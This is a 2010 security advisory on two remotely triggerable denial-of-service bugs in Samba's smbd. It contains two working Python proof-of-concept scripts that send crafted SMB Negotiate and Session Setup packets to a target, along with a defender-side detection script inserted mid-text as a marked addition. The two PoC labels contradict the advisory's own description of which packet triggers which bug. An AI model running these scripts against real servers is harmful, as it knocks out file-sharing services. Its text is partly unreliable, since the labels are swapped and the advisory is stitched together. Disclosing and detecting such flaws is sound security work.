===============================================================================
stratsec Security Advisory: SS-2010-005
===============================================================================

Title:            Samba Multiple DoS Vulnerabilities
Version:          1.0
Issue type:       Multiple
Affected vendor:  Samba
Release date:     12/05/2010
Discovered by:    Laurent Gaffié
Issue status:     Patch available

===============================================================================

Summary
-------

Two vulnerabilities were discovered within the Samba smbd daemon which allow an attacker to trigger a null pointer dereference or an uninitialised variable read by sending a specific 'Session Setup AndX' query. Successful exploitation of these issues will result in a denial of service.

Description
-----------

The Server Message Block (SMB) protocol, also known as Common Internet File System (CIFS), acts as an application-layer protocol providing shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE/RPC) operations.

After negotiating an SMB connection, the client sends a 'Session Setup AndX' packet to negotiate a session in order to be able to connect to a specific share.

To trigger the null pointer dereference, the client needs to send a crafted SMB 'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003' (no Unicode), followed by a 'Session Setup AndX' request with the SMB header 'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash within the smbd process.

The uninitialised variable read issue can be triggered if the client sends a crafted 'Session Setup AndX' with a 'security blob length' value set to '\xff\xff'.
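As an added, defender-side example (not part of this advisory and not Samba's code), the following Python parses the two requests described above from one client connection and flags both malformed patterns: a Flags2 UNICODE bit that differs between 'Negotiate Protocol' and 'Session Setup AndX', and an extended-security 'Session Setup AndX' whose security blob length exceeds the bytes actually present. The sample packets are constructed inline by a minimal builder; field offsets follow the 32-byte SMB1 header and the WordCount-12 Session Setup AndX request layout.

```python
import struct
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000          # SMB header Flags2 bit: strings are UTF-16LE

def parse_smb1(msg):
    """Split one NetBIOS-framed SMB1 message into (command, flags2, words, data)."""
    if len(msg) < 36 or msg[4:8] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    body = msg[4:]               # drop the 4-byte NetBIOS session header
    command, flags2 = body[4], struct.unpack_from("<H", body, 10)[0]
    wordcount = body[32]
    words = body[33:33 + 2 * wordcount]
    bytecount = struct.unpack_from("<H", body, 33 + 2 * wordcount)[0]
    data = body[35 + 2 * wordcount:35 + 2 * wordcount + bytecount]
    return command, flags2, words, data

def audit_session(messages):
    """Return findings for one client connection's requests, in wire order."""
    findings, nego_unicode = [], None
    for msg in messages:
        command, flags2, words, data = parse_smb1(msg)
        if command == SMB_COM_NEGOTIATE:
            nego_unicode = bool(flags2 & FLAGS2_UNICODE)
        elif command == SMB_COM_SESSION_SETUP_ANDX:
            if nego_unicode is not None and nego_unicode != bool(flags2 & FLAGS2_UNICODE):
                findings.append("unicode flag flipped between Negotiate and Session Setup AndX")
            if len(words) == 24:  # WordCount 12: extended-security form, carries a security blob
                blob_len = struct.unpack_from("<H", words, 14)[0]
                if blob_len > len(data):
                    findings.append(f"security blob length {blob_len:#06x} exceeds {len(data)} data bytes")
    return findings

def smb1_message(command, flags2, words, data):
    """Build a minimal NetBIOS-framed SMB1 request (constructed test input, not a real client)."""
    header = b"\xffSMB" + bytes([command]) + bytes(4) + b"\x18" + struct.pack("<H", flags2) + bytes(20)
    body = header + bytes([len(words) // 2]) + words + struct.pack("<H", len(data)) + data
    return struct.pack(">I", len(body)) + body

def session_setup_words(blob_len):
    # AndX(4) MaxBuffer MaxMpx VcNumber SessionKey SecurityBlobLength Reserved Capabilities
    return struct.pack("<BBHHHHIHII", 0xFF, 0, 0, 0x1104, 50, 0, 0, blob_len, 0, 0xA00000D4)

NEGOTIATE_DATA = b"\x02NT LM 0.12\x00"          # one dialect string, as in a real Negotiate
BLOB = b"NTLMSSP\x00" + bytes(32)                # constructed stand-in for a 40-byte security blob
def flag_flip_session():      # Negotiate without UNICODE (0x0003), Session Setup with it (0x8003)
    return [smb1_message(SMB_COM_NEGOTIATE, 0x0003, b"", NEGOTIATE_DATA),
            smb1_message(SMB_COM_SESSION_SETUP_ANDX, 0x8003, session_setup_words(len(BLOB)), BLOB)]
def oversized_blob_session(): # consistent flags, but blob length 0xffff with only 40 bytes present
    return [smb1_message(SMB_COM_NEGOTIATE, 0xC853, b"", NEGOTIATE_DATA),
            smb1_message(SMB_COM_SESSION_SETUP_ANDX, 0xC807, session_setup_words(0xFFFF), BLOB)]
```

Run `audit_session` over the requests of a captured or proxied connection; an empty list means neither pattern was seen.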
Impact
------

A remote attacker can cause a denial of service within the Samba daemon.

Affected products
-----------------

Samba <= 3.4.7 and Samba <= 3.5.1

Proof of concept
----------------

To trigger the uninitialised variable read issue, the following Python proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1: sys.exit('Usage: python smbd.py 10.0.0.12')
host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

To trigger the null pointer dereference issue, this Python proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1: sys.exit('Usage: python smbd.py 10.0.0.12')
host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff"  # security blob length set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

Solution
--------

Update to version 3.5.2 or 3.4.8 (http://samba.org/).

Response timeline
-----------------

* 09/03/2010 - Null pointer dereference issue reported to vendor.
* 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after receiving the initial email.
* 09/03/2010 - Vendor confirms issue presence and provides a patch 3 hours after receiving the initial email.
* 09/03/2010 - stratsec confirms patch resolves issue.
* 15/03/2010 - Uninitialised variable read issue reported to vendor.
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours after receiving the initial email.
* 15/03/2010 - stratsec confirms patch resolves issue.
* 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues.
* 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues.
* 12/05/2010 - This advisory published.
References
----------

* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
* https://bugzilla.samba.org/show_bug.cgi?id=7254
* stratsec would like to thank the Samba Security Team for their responsiveness while handling these issues.

===============================================================================

About stratsec
--------------

stratsec specialises in providing information security consulting and testing services for government and commercial clients. Established in 2004, we are now one of the leading independent information security companies in the Australasian and SE-Asian region, with offices throughout Australia and in Singapore and Malaysia.

For more information, please visit our website at http://www.stratsec.net/

===============================================================================